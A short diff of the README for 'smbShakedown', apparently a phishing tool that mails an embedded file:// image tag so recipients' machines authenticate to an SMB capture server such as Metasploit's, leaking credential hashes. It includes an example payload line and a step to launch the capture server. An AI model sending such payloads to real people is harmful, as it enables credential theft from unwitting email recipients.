B34MR/smbShakedown/README.md

     4.Enter SMBCapture Server IP address, so it can be placed in body of email:
     EX: <img src=file://127.0.0.1/image/foo.gif>

-    5.SMBCapture Server can be hosted locally:
-    EX: Metasploit's SMB Capture server can be configured to automatically launch.
+    5. Choose whether or not to launch Metasploit's SMB Capture server.

 #To do:
     Multiple recipient address support.
     SMTP Anonymous Auth option